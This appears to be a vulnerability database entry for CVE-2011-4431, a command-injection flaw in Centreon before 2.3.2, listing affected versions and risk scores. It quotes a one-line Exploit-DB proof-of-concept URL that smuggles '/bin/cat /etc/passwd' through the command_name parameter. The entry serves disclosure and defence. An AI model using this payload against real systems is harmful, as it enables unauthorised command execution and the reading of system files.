CVE-2011-4431

medium

Published 2011-11-10 · Modified 2026-04-29

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

7.5

Description

Directory traversal vulnerability in main.php in Merethis Centreon before 2.3.2 allows remote authenticated users to execute arbitrary commands via a .. (dot dot) in the command_name parameter.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-36293 webapps php verified text · 1 KB

Christophe de la Fuente · 2011-11-04

Centreon 2.3.1 - 'command_name' Remote Command Execution

text exploit Source: Exploit-DB

source: https://www.securityfocus.com/bid/50568/info

Centreon is prone to a remote command-injection vulnerability.

Attackers can exploit this issue to execute arbitrary commands in the context of the application.

Centreon 2.3.1 is affected; other versions may also be vulnerable. 

http://www.example.com/centreon/main.php?p=60706&command_name=/Centreon/SNMP/../../../../bin/cat%20/etc/passwd%20%23&o=h&min=1

Application impact

Vendor	Product	Versions
merethis	centreon	`{"endIncluding":"2.3.1"}`
merethis	centreon	`1.4`
merethis	centreon	`1.4.1`
merethis	centreon	`1.4.2`
merethis	centreon	`1.4.2.1`
merethis	centreon	`1.4.2.2`
merethis	centreon	`1.4.2.3`
merethis	centreon	`1.4.2.4`
merethis	centreon	`1.4.2.5`
merethis	centreon	`1.4.2.6`
merethis	centreon	`1.4.2.7`
merethis	centreon	`2.0`
merethis	centreon	`2.0.1`
merethis	centreon	`2.0.2`
merethis	centreon	`2.1.0`
merethis	centreon	`2.1.1`
merethis	centreon	`2.1.2`
merethis	centreon	`2.1.3`
merethis	centreon	`2.1.4`
merethis	centreon	`2.1.5`
merethis	centreon	`2.1.6`
merethis	centreon	`2.1.7`
merethis	centreon	`2.1.8`
merethis	centreon	`2.1.9`
merethis	centreon	`2.1.10`
merethis	centreon	`2.1.11`
merethis	centreon	`2.1.12`
merethis	centreon	`2.1.13`
merethis	centreon	`2.2`
merethis	centreon	`2.2.1`
merethis	centreon	`2.2.2`
merethis	centreon	`2.3.0`

References

CWEs

CWE-22

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.